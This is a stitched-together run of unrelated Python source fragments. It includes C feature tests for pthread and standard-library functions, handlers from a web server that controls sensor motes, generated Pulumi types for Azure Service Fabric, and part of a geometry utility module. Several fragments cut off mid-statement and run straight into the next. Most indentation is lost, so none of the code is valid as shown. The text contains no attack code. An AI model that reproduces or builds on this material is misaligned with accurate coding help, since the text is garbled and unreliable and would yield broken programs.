if (pthread_mutex_unlock(&mutex) != 0) return 1;
if (pthread_mutex_destroy(&mutex) != 0) return 1;
return 0;
}
''')
    @property
    def pthread_mutex_unlock(self):
if self.pthread_mutex_init:
return c.Function('int', 'pthread_mutex_t*')
pthread_mutexattr_destroy = c.function_test('int', 'pthread_mutexattr_t*')
pthread_mutexattr_getprioceiling = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_getprotocol = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_getpshared = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_gettype = c.function_test('int', 'const pthread_mutexattr_t*', 'int*')
pthread_mutexattr_init = c.function_test('int', 'pthread_mutexattr_t*')
pthread_mutexattr_setprioceiling = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_mutexattr_setprotocol = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_mutexattr_setpshared = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_mutexattr_settype = c.function_test('int', 'pthread_mutexattr_t*', 'int')
pthread_once = c.function_test('int', 'pthread_once_t*', 'void (*)(void)')
@property
def pthread_rwlock_destroy(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
pthread_rwlock_init = c.function_test('int', 'pthread_rwlock_t*', 'const pthread_rwlockattr_t*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_rdlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_wrlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
@property
def pthread_rwlock_rdlock(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
pthread_rwlock_timedrdlock = c.function_test('int', 'pthread_rwlock_t*', 'const struct timespec*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_timedrdlock(&rwlock, &t) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
pthread_rwlock_timedwrlock = c.function_test('int', 'pthread_rwlock_t*', 'const struct timespec*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_timedwrlock(&rwlock, &t) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
pthread_rwlock_tryrdlock = c.function_test('int', 'pthread_rwlock_t*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_tryrdlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
pthread_rwlock_trywrlock = c.function_test('int', 'pthread_rwlock_t*', test='''
#include <pthread.h>
int main() {
pthread_rwlock_t rwlock = PTHREAD_RWLOCK_INITIALIZER;
if (pthread_rwlock_init(&rwlock, 0) != 0) return 1;
if (pthread_rwlock_trywrlock(&rwlock) != 0) return 1;
if (pthread_rwlock_unlock(&rwlock) != 0) return 1;
if (pthread_rwlock_destroy(&rwlock) != 0) return 1;
return 0;
}
''')
@property
def pthread_rwlock_unlock(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
@property
def pthread_rwlock_wrlock(self):
if self.pthread_rwlock_init:
return c.Function('int', 'pthread_rwlock_t*')
pthread_rwlockattr_destroy = c.function_test('int', 'pthread_rwlockattr_t*')
pthread_rwlockattr_getpshared = c.function_test('int', 'const pthread_rwlockattr_t*', 'int*')
pthread_rwlockattr_init = c.function_test('int', 'pthread_rwlockattr_t*')
pthread_rwlockattr_setpshared = c.function_test('int', 'pthread_rwlockattr_t*', 'int')
pthread_self = c.function_test('pthread_t', 'void')
pthread_setcancelstate = c.function_test('int', 'int', 'int*')
pthread_setcanceltype = c.function_test('int', 'int', 'int*')
pthread_setconcurrency = c.function_test('int', 'int')
pthread_setschedparam = c.function_test('int', 'pthread_t', 'int', 'const struct sched_param*')
pthread_setschedprio = c.function_test('int', 'pthread_t', 'int')
pthread_setspecific = c.function_test('int', 'pthread_key_t', 'const void*')
@property
def pthread_spin_destroy(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
pthread_spin_init = c.function_test('int', 'pthread_spinlock_t*', 'int', test='''
#include <pthread.h>
int main() {
pthread_spinlock_t spin;
if (pthread_spin_init(&spin, 0) != 0) return 1;
if (pthread_spin_lock(&spin) != 0) return 1;
if (pthread_spin_unlock(&spin) != 0) return 1;
if (pthread_spin_trylock(&spin) != 0) return 1;
if (pthread_spin_unlock(&spin) != 0) return 1;
if (pthread_spin_destroy(&spin) != 0) return 1;
return 0;
}
''')
@property
def pthread_spin_lock(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
@property
def pthread_spin_trylock(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
@property
def pthread_spin_unlock(self):
if self.pthread_spin_init:
return c.Function('int', 'pthread_spinlock_t*')
pthread_testcancel = c.function_test('void', 'void')
class pwd_h(c.Test):
header = c.header_test('pwd.h')
class regex_h(c.Test):
header = c.header_test('regex.h')
class sched_h(c.Test):
header = c.header_test('sched.h')
class search_h(c.Test):
header = c.header_test('search.h')
class semaphore_h(c.Test):
header = c.header_test('semaphore.h')
class setjmp_h(c99.setjmp_h):
sigjmp_buf = c.type_test()
siglongjmp = c.function_test('void', 'sigjmp_buf', 'int', test='''
#include <setjmp.h>
int main() {
jmp_buf env;
int i = sigsetjmp(env, 0);
if (i == 2) return 0;
siglongjmp(env, 2);
return 2;
}
''')
@property
def sigsetjmp(self):
if self.siglongjmp:
return c.Function('int', 'sigjmp_buf', 'int')
class signal_h(c99.signal_h):
pass
class spawn_h(c.Test):
header = c.header_test('spawn.h')
class stdarg_h(c99.stdarg_h):
pass
stdbool_h = c99.stdbool_h
stddef_h = c99.stddef_h
class stdint_h(c99.stdint_h):
pass
class stdio_h(c99.stdio_h):
pass
class stdlib_h(c99.stdlib_h):
drand48 = c.function_test('double', 'void')
lrand48 = c.function_test('long', 'void')
mkstemp = c.function_test('int', 'char*', test='''
#include <stdlib.h>
#include <unistd.h>
int main() {
char s[] = "XXXXXX";
int fd;
if ((fd = mkstemp(s)) == -1) return 1;
if (close(fd) == -1) return 1;
return 0;
}
''')
realpath = c.function_test('char*', 'const char*', 'char*')
srand = c.function_test('void', 'unsigned int')
srand48 = c.function_test('void', 'long')
class string_h(c99.string_h):
strdup = c.function_test('char*', 'const char*')
strerror_r = c.function_test('int', 'int', 'char*', 'size_t', test='''
#include <string.h>
int main() {
char b[50];
int r = strerror_r(0, b, 50);
return r == 0 ? 0 : 1;
}
''')
class strings_h(c.Test):
    header = c.header_test('strings.h')
+ "/write?port=" + fullPortName
try:
req = urllib2.urlopen(url, qs["data"][0])
output = req.read()
self.writeChunk(output)
except Exception as e:
self.writeChunk("hostUnreachable")
def serveListen(self, qs):
self.setSession(qs)
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
motesText = self.serveMotes("listen", "Listen", qs, None, True)
errorStyle = "none"
errorMsg = ""
global isListening
if "action" in qs and self.getLevel() > 1:
if qs["action"][0] == "Start":
if not motes.anySelected():
errorMsg = "\n<h4 class='err'>Error: No motes selected!</h4>\n"
errorStyle = "block"
elif isListening:
errorMsg = "\n<h4 class='err'>Already listening!</h4>\n"
errorStyle = "block"
else:
sensor_data.moteData.reset()
ht.openAllSerial()
isListening = True
# Open DB connection
data_utils.openDBConnection()
else:
ht.closeAllSerial()
isListening = False
# Close DB connection
data_utils.closeDBConnection()
txt = ""
for line in sensor_data.moteData.listenTxt:
txt += line + "<br/>"
if errorMsg == "":
action = "Stop" if isListening else "Start"
else:
action = "Start"
dataFilename = configuration.c.getCfgValue("saveToFilename")
saveProcessedData = configuration.c.getCfgValueAsBool("saveProcessedData")
if self.getLevel() > 1:
if "dataFile" in qs:
dataFilename = qs["dataFile"][0]
if len(dataFilename) and dataFilename.find(".") == -1:
dataFilename += ".csv"
if "dataType" in qs:
saveProcessedData = not qs["dataType"][0] == "raw"
saveMultipleFiles = qs["dataType"][0] == "mprocessed"
configuration.c.setCfgValue("saveToFilename", dataFilename)
configuration.c.setCfgValue("saveProcessedData", bool(saveProcessedData))
configuration.c.save()
rawdataChecked = not saveProcessedData
mprocessedChecked = saveProcessedData
self.serveAnyPage("listen", qs, True, {"MOTES_TXT" : motesText,
"LISTEN_TXT" : txt,
"MOTE_ACTION": action,
"DATA_FILENAME" : dataFilename,
"RAWDATA_CHECKED" : 'checked="checked"' if rawdataChecked else "",
"MPROCDATA_CHECKED" : 'checked="checked"' if mprocessedChecked else "",
"ERROR_MSG" : errorMsg,
"ERROR_STATUS" : errorStyle})
def serveMotes(self, action, namedAction, qs, form, extra = False):
disabled = "" if self.getLevel() > 1 else 'disabled="disabled" '
c = ""
for m in motes.getMotesSorted():
name = "mote" + m.getFullBasename()
if qs:
if name in qs:
m.isSelected = qs[name][0] == 'on'
elif "action" in qs:
m.isSelected = False
elif form:
if name in form:
m.isSelected = form[name].value == "on"
else:
m.isSelected = False
checked = ' checked="checked"' if m.isSelected else ""
c += '<div class="mote"><strong>Mote: </strong>'
if extra:
c += "<a href='javascript:talkToMote(\"" + utils.urlEscape(m.getFullBasename()) +"\")' " + disabled + ">"
arr = m.getFullName().split("@")
if (len(arr) == 1):
c += m.getFullName()
else:
c += arr[0]
arr = m.getFullName().split("@")
if arr[1] != "Local":
c += " @ " + m.getFullName().split("@")[1][7:].split(":")[0]
c += "</a>"
else:
c += m.getFullName()
c += ' (<strong>Platform: </strong>' + m.platform + ') '
c += ' <input type="checkbox" title="Select the mote" name="' + name + '"'
c += checked + ' ' + disabled + '/>' + namedAction
c += '</div>\n'
# remember which motes were selected and which were not
motes.storeSelected()
if c:
c = '<div class="motes1">\nAttached motes:\n<br/>\n' + c + '</div>\n'
return c
def serveBlockly(self, qs):
self.setSession(qs)
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
self.serveAnyPage("blockly", qs)
def serveSealFrame(self, qs):
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
path = os.path.join(self.sealBlocklyDirectory, "index.html")
with open(path) as f:
contents = f.read()
disabled = 'disabled="disabled"' if not self.getLevel() > 1 else ""
contents = contents.replace("%DISABLED%", disabled)
motesText = self.serveMotes("upload", "Upload", qs, None)
contents = contents.replace("%MOTES_TXT%", motesText)
self.writeChunk(contents)
def serve404Error(self, path, qs):
self.setSession(qs)
self.send_response(404)
self.sendDefaultHeaders()
self.end_headers()
qs["no"] = "no"
self.serveAnyPage("error", qs,
errorMsg = "<strong>Error 404: path " + path + " not found on the server</strong>\n")
def serveFile(self, filename, qs):
mimetype = 'text/html'
if filename[-4:] == '.css':
mimetype = 'text/css'
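            # "theme.css" is resolved indirectly: start from the server-wide theme named in
            # the configuration, then let a logged-in user's "theme" preference override it
            # when that theme file actually exists on disk.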
if filename[-9:] == 'theme.css':
tpath = filename[:-4]
filename = filename[:-4] + configuration.c.getCfgValue("serverTheme") + '.css'
theme = self.getCookie("Msma37")
if theme:
theme = allSessions.get_session_old(theme)
if theme and hasattr(theme, "_user") and "theme" in theme._user and theme._user["theme"] != "server":
# "server" means as same as server
theme = tpath + theme._user["theme"] + '.css'
if os.path.exists(theme):
filename = theme
elif filename[-3:] == '.js': mimetype = 'application/javascript'
elif filename[-4:] == '.png': mimetype = 'image/png'
elif filename[-4:] == '.gif': mimetype = 'image/gif'
elif filename[-4:] == '.jpg': mimetype = 'image/jpg'
elif filename[-4:] == '.tif': mimetype = 'image/tif'
try:
f = open(filename, "rb")
contents = f.read()
self.send_response(200)
self.send_header('Content-Type', mimetype)
self.send_header('Content-Length', str(len(contents)))
self.send_header('Cache-Control', 'public,max-age=1000')
if DEBUG:
# enable cache
self.send_header('Last-Modified', 'Wed, 15 Sep 2004 12:00:00 GMT')
self.send_header('Expires', 'Sun, 17 Jan 2038 19:14:07 GMT')
self.end_headers()
self.wfile.write(contents)
f.close()
except:
print("problem with file " + filename + "\n")
self.serve404Error(filename, qs)
def do_GET(self):
self.headerIsServed = False
o = urlparse(self.path)
qs = parse_qs(o.query)
# global lastUploadCode
# global lastUploadConfig
# global lastUploadFile
# TODO:
# if "Android" in self.headers["user-agent"]:
# self.htmlDirectory = self.htmlDirectory + "_mobile"
if o.path == "/" or o.path == "/default":
self.serveDefault(qs)
elif o.path == "/motes":
self.serveMoteSelect(qs)
elif o.path == "/config":
self.serveConfig(qs)
elif o.path == "/graph":
self.serveGraphs(qs)
elif o.path == "/graph-data":
self.serveGraphData(qs)
elif o.path == "/graph-form":
self.serveGraphForm(qs)
elif o.path == "/upload":
self.serveUploadGet(qs) #, lastUploadCode, lastUploadConfig, lastUploadFile)
elif o.path == "/login":
self.serveLogin(qs)
elif o.path == "/server":
self.serveServer(qs)
elif o.path == "/account":
self.serveAccount(qs)
elif o.path == "/users":
self.serveUsers(qs)
elif o.path == "/upload-result":
self.serveUploadResult(qs)
elif o.path == "/listen":
self.serveListen(qs)
elif o.path == "/listen-single":
self.serveListenSingle(qs)
elif o.path == "/talk-to":
self.serveTalkTo(qs)
elif o.path == "/listen-data":
self.serveListenData(qs)
elif o.path == "/blockly":
self.serveBlockly(qs)
elif o.path == "/seal-frame":
self.serveSealFrame(qs)
elif o.path[:13] == "/seal-blockly":
self.serveFile(os.path.join(self.sealBlocklyDirectory, o.path[14:]), qs)
elif o.path == "/sync":
self.serveSync(qs)
elif o.path == "/code":
# qs['src'] contains SEAL-Blockly code
code = qs.get('src')[0] if "src" in qs else ""
config = qs.get('config')[0] if "config" in qs else ""
# Parse the form data posted
self.serveMotes("upload", "Upload", qs, None)
if motes.anySelected():
self.compileAndUpload(code, config, None, None, 'seal')
self.serveSync(qs)
elif o.path[-4:] == ".css":
self.serveFile(os.path.join(self.htmlDirectory, "css", o.path[1:]), qs)
elif o.path[-4:] in [".png", ".jpg", ".gif", ".tif"]:
self.serveFile(os.path.join(self.htmlDirectory, "img", o.path[1:]), qs)
elif o.path[-3:] in [".js"]:
self.serveFile(os.path.join(self.htmlDirectory, "js", o.path[1:]), qs)
else:
self.serve404Error(o.path, qs)
def serveBody(self, name, qs = {'sma': ['0000000'],}, replaceValues = None):
contents = ""
disabled = "" if self.getLevel() > 1 else 'disabled="disabled" '
with open(self.htmlDirectory + "/" + name + ".html", "r") as f:
contents = f.read()
if replaceValues:
for v in replaceValues:
contents = contents.replace("%" + v + "%", replaceValues[v])
contents = contents.replace("%DISABLED%", disabled)
if "sma" in qs: contents = contents.replace("%SMA%", qs["sma"][0])
return contents
# Dummy, have to respond somehow, so javascript knows we are here
def serveSync(self, qs):
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
if self.getLevel() > 1:
self.writeChunk("writeAccess=True")
def serveListenData(self, qs):
self.send_response(200)
self.sendDefaultHeaders()
self.end_headers()
text = ""
for line in sensor_data.moteData.listenTxt:
text += line + "<br/>"
if text:
self.writeChunk(text)
def do_POST(self):
self.headerIsServed = False
o = urlparse(self.path)
qs = parse_qs(o.query)
# TODO
# if "Android" in self.headers["user-agent"]:
# self.htmlDirectory = self.htmlDirectory + "_mobile"
# global lastUploadCode
# global lastUploadConfig
# global lastUploadFile
if o.path == "/upload":
self.serveUploadPost(qs) #, lastUploadCode, lastUploadConfig, lastUploadFile)
else:
self.serve404Error(o.path, qs)
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
# Overrides BaseServer function to get better control over interrupts
def serve_forever(self, poll_interval = 0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self._BaseServer__is_shut_down.clear()
try:
while not self._BaseServer__shutdown_request:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = select.select([self], [], [], poll_interval)
if self in r:
self._handle_request_noblock()
finally:
self._BaseServer__shutdown_request = False
self._BaseServer__is_shut_down.set()
if os.name == "posix":
# kill the process to make sure it exits
os.kill(os.getpid(), signal.SIGKILL)
# --------------------------------------------
def makeDefaultUserFile(userDirectory, userFile):
if not os.path.exists(userDirectory):
os.makedirs(userDirectory)
uf = open(userDirectory + "/" + userFile, "w")
for at in configuration.c.getCfgValueAsList("userAttributes"):
uf.write(at + " ")
uf.write("\n")
for ad in configuration.c.getCfgValueAsList("adminValues"):
uf.write(ad + " ")
uf.write("\n")
for x in configuration.c.getCfgValueAsList("defaultValues"):
if x.lower() == "unknown": x = "user"
uf.write(x + " ")
uf.write("\n")
uf.close()
return str(userDirectory + "/" + userFile)
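# Resulting layout of the user file (sketch): three whitespace-separated lines holding,
# in order, the configured user attribute names, the admin account's values, and the
# default values (with any "unknown" default replaced by "user").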
def readUsers(userDirectory, userFile):
global allUsers
uf = open(userDirectory + "/" + userFile,"r")
i = False
for line in uf:
if not i:
i = True
allUsers = user.Users(line.split(), userDirectory, userFile)
else:
allUsers.add_user(line.split())
uf.close()
return i
def initalizeUsers():
global allSessions
allSessions = session.Sessions()
userDirectory = os.path.abspath(configuration.c.getCfgValue("userDirectory"))
userFile = configuration.c.getCfgValue("userFile")
if not os.path.exists(userDirectory + "/" + userFile):
print("No user file. Add default in " + makeDefaultUserFile(userDirectory, userFile))
if not readUsers(userDirectory, userFile):
print("User file is empty!")
print("New default file made in " + makeDefaultUserFile(userDirectory, userFile))
readUsers(userDirectory, userFile)
if not "name" in allUsers._userAttributes:
        print("User attribute \"name\"
None:
pulumi.set(__self__, "x509_store_name", x509_store_name)
@property
@pulumi.getter(name="commonNames")
def common_names(self) -> Optional[Sequence['outputs.ServerCertificateCommonNameResponse']]:
"""
The list of server certificates referenced by common name that are used to secure the cluster.
"""
return pulumi.get(self, "common_names")
@property
@pulumi.getter(name="x509StoreName")
def x509_store_name(self) -> Optional[str]:
"""
The local certificate store location.
"""
return pulumi.get(self, "x509_store_name")
@pulumi.output_type
class ServiceCorrelationDescriptionResponse(dict):
"""
Creates a particular correlation between services.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "serviceName":
suggest = "service_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceCorrelationDescriptionResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceCorrelationDescriptionResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceCorrelationDescriptionResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
scheme: str,
service_name: str):
"""
Creates a particular correlation between services.
:param str scheme: The ServiceCorrelationScheme which describes the relationship between this service and the service specified via ServiceName.
:param str service_name: The name of the service that the correlation relationship is established with.
"""
pulumi.set(__self__, "scheme", scheme)
pulumi.set(__self__, "service_name", service_name)
@property
@pulumi.getter
def scheme(self) -> str:
"""
The ServiceCorrelationScheme which describes the relationship between this service and the service specified via ServiceName.
"""
return pulumi.get(self, "scheme")
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> str:
"""
The name of the service that the correlation relationship is established with.
"""
return pulumi.get(self, "service_name")
@pulumi.output_type
class ServiceLoadMetricDescriptionResponse(dict):
"""
Specifies a metric to load balance a service during runtime.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "defaultLoad":
suggest = "default_load"
elif key == "primaryDefaultLoad":
suggest = "primary_default_load"
elif key == "secondaryDefaultLoad":
suggest = "secondary_default_load"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceLoadMetricDescriptionResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceLoadMetricDescriptionResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceLoadMetricDescriptionResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
default_load: Optional[int] = None,
primary_default_load: Optional[int] = None,
secondary_default_load: Optional[int] = None,
weight: Optional[str] = None):
"""
Specifies a metric to load balance a service during runtime.
:param str name: The name of the metric. If the service chooses to report load during runtime, the load metric name should match the name that is specified in Name exactly. Note that metric names are case sensitive.
:param int default_load: Used only for Stateless services. The default amount of load, as a number, that this service creates for this metric.
:param int primary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Primary replica.
:param int secondary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Secondary replica.
:param str weight: The service load metric relative weight, compared to other metrics configured for this service, as a number.
"""
pulumi.set(__self__, "name", name)
if default_load is not None:
pulumi.set(__self__, "default_load", default_load)
if primary_default_load is not None:
pulumi.set(__self__, "primary_default_load", primary_default_load)
if secondary_default_load is not None:
pulumi.set(__self__, "secondary_default_load", secondary_default_load)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the metric. If the service chooses to report load during runtime, the load metric name should match the name that is specified in Name exactly. Note that metric names are case sensitive.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="defaultLoad")
def default_load(self) -> Optional[int]:
"""
Used only for Stateless services. The default amount of load, as a number, that this service creates for this metric.
"""
return pulumi.get(self, "default_load")
@property
@pulumi.getter(name="primaryDefaultLoad")
def primary_default_load(self) -> Optional[int]:
"""
Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Primary replica.
"""
return pulumi.get(self, "primary_default_load")
@property
@pulumi.getter(name="secondaryDefaultLoad")
def secondary_default_load(self) -> Optional[int]:
"""
Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Secondary replica.
"""
return pulumi.get(self, "secondary_default_load")
@property
@pulumi.getter
def weight(self) -> Optional[str]:
"""
The service load metric relative weight, compared to other metrics configured for this service, as a number.
"""
return pulumi.get(self, "weight")
@pulumi.output_type
class ServicePlacementPolicyDescriptionResponse(dict):
"""
Describes the policy to be used for placement of a Service Fabric service.
"""
def __init__(__self__, *,
type: str):
"""
Describes the policy to be used for placement of a Service Fabric service.
:param str type: The type of placement policy for a service fabric service. Following are the possible values.
"""
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> str:
"""
The type of placement policy for a service fabric service. Following are the possible values.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class ServiceTypeDeltaHealthPolicyResponse(dict):
"""
Represents the delta health policy used to evaluate the health of services belonging to a service type when upgrading the cluster.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "maxPercentDeltaUnhealthyServices":
suggest = "max_percent_delta_unhealthy_services"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceTypeDeltaHealthPolicyResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceTypeDeltaHealthPolicyResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceTypeDeltaHealthPolicyResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
max_percent_delta_unhealthy_services: Optional[int] = None):
"""
Represents the delta health policy used to evaluate the health of services belonging to a service type when upgrading the cluster.
:param int max_percent_delta_unhealthy_services: The maximum allowed percentage of services health degradation allowed during cluster upgrades.
The delta is measured between the state of the services at the beginning of upgrade and the state of the services at the time of the health evaluation.
The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits.
"""
if max_percent_delta_unhealthy_services is None:
max_percent_delta_unhealthy_services = 0
if max_percent_delta_unhealthy_services is not None:
pulumi.set(__self__, "max_percent_delta_unhealthy_services", max_percent_delta_unhealthy_services)
@property
@pulumi.getter(name="maxPercentDeltaUnhealthyServices")
def max_percent_delta_unhealthy_services(self) -> Optional[int]:
"""
The maximum allowed percentage of services health degradation allowed during cluster upgrades.
The delta is measured between the state of the services at the beginning of upgrade and the state of the services at the time of the health evaluation.
The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits.
"""
return pulumi.get(self, "max_percent_delta_unhealthy_services")
@pulumi.output_type
class ServiceTypeHealthPolicyResponse(dict):
"""
Represents the health policy used to evaluate the health of services belonging to a service type.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "maxPercentUnhealthyServices":
suggest = "max_percent_unhealthy_services"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceTypeHealthPolicyResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceTypeHealthPolicyResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceTypeHealthPolicyResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
max_percent_unhealthy_services: Optional[int] = None):
"""
Represents the health policy used to evaluate the health of services belonging to a service type.
:param int max_percent_unhealthy_services: The maximum percentage of services allowed to be unhealthy before your application is considered in error.
"""
if max_percent_unhealthy_services is None:
max_percent_unhealthy_services = 0
if max_percent_unhealthy_services is not None:
pulumi.set(__self__, "max_percent_unhealthy_services", max_percent_unhealthy_services)
@property
@pulumi.getter(name="maxPercentUnhealthyServices")
def max_percent_unhealthy_services(self) -> Optional[int]:
"""
The maximum percentage of services allowed to be unhealthy before your application is considered in error.
"""
return pulumi.get(self, "max_percent_unhealthy_services")
@pulumi.output_type
class SettingsParameterDescriptionResponse(dict):
"""
Describes a parameter in fabric settings of the cluster.
"""
def __init__(__self__, *,
name: str,
value: str):
"""
Describes a parameter in fabric settings of the cluster.
:param str name: The parameter name of fabric setting.
:param str value: The parameter value of fabric setting.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> str:
"""
The parameter name of fabric setting.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def value(self) -> str:
"""
The parameter value of fabric setting.
"""
return pulumi.get(self, "value")
@pulumi.output_type
class SettingsSectionDescriptionResponse(dict):
"""
    Describes a section in the fabric settings of the cluster.
# Source repository: geobarry/line-simplipy
#-------------------------------------------------------------------------------
# Name: geom utils
# Purpose: various geometry functions
# License: MIT License
#-------------------------------------------------------------------------------
import data_utils as d
import math as __m
import matplotlib.pyplot as plt
from scipy.spatial import cKDTree
from decimal import Decimal as dec
def clockwise_sequence(edges):
"""
Determines a clockwise sequence of the input edges around their shared 1st vertex.
    * Can handle edges that start in the same direction but then later split;
      no accommodation is made for floating-point errors or precision tolerance.
Parameters
----------
edges : list of lists of (x,y) tuples
List of edges. Each edge must have the same first vertex. No edge should be
identical to or a subset of another edge
Returns
-------
seq : list
Sequence of edge indices, so that result[i] represents the edge in position i.
"""
# HELPER FUNCTION
def get_subedges(tied_edges):
"""Creates a set of sub edges from split vertex, including reverse leader segment
Input edges should start from same pt and go in same direction"""
origin = tied_edges[0][0] # get shared 1st vertex
v2list = [e[1] for e in tied_edges] # get 2nd vertex of all edges
v2set = set(v2list) # find unique pts
# get closest to origin
if len(v2set) != 1:
dist_list = [distance_pts(origin,v2) for v2 in v2list]
min_id = d.min_id(dist_list)
# min_id, min_d = min(enumerate(dist_list), key=itemgetter(1))
fulcrum = v2list[min_id]
else:
fulcrum = v2list[0]
# create sub_edges by truncating
def check_subedge(e,fulcrum):
if e[0] == fulcrum:
return e
else:
return [fulcrum] + e
subedges=[check_subedge(e[1:], fulcrum) for e in tied_edges]
subedges.append([fulcrum,origin]) # add reverse leader
return subedges
# MAIN CODE
# error checking
# *** need to handle case where "edge" has only one vertex
# *** by simply placing it in any place in sequence
# pull out degenerate edges
degenerate_edge_ids = [i for i in range(len(edges)) if len(edges[i])<2]
legitimate_edge_ids = [i for i in range(len(edges)) if len(edges[i])>=2]
legitimate_edges = [edges[i] for i in legitimate_edge_ids]
# work on legitimate edges
n = len(legitimate_edge_ids)
bearings = [-1*bearing(edge[0],edge[1]) for edge in legitimate_edges]
seq,ranks = d.sequence_info(bearings)
r=0
# obtain and handle sets of ties
while r < n-1:
# get list of identical bearings
tie_ranks = [r]
while r < n-1 and bearings[seq[r+1]] == bearings[seq[r]]:
r += 1
tie_ranks.append(r)
# handle set of identical bearings
if len(tie_ranks) > 1:
# get subedges
tied_edges = [legitimate_edges[seq[r]] for r in tie_ranks]
subedges = get_subedges(tied_edges)
# get subedge order
subseq = clockwise_sequence(subedges)
lead_pos = subseq.index(len(subedges)-1)
subseq = subseq[lead_pos+1:] + subseq[:lead_pos]
# make replacements
replaces = [(tie_ranks[i],seq[tie_ranks[subseq[i]]]) for i in range(len(tie_ranks))]
for repl in replaces:
seq[repl[0]] = repl[1]
# move to next rank
r += 1
# convert to original index
seq=[legitimate_edge_ids[i] for i in seq]
# add back in degenerate edge ids
seq = seq + degenerate_edge_ids
return seq
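# Illustrative sketch (not part of the original module): a minimal call to
# clockwise_sequence on three edges sharing the first vertex (0, 0). The
# ordering noted in the comment is my reading of the docstring, not a test.
def _example_clockwise_sequence():
    edges = [
        [(0, 0), (0, 1)],    # pointing up
        [(0, 0), (1, 0)],    # pointing right
        [(0, 0), (-1, -1)],  # pointing down-left
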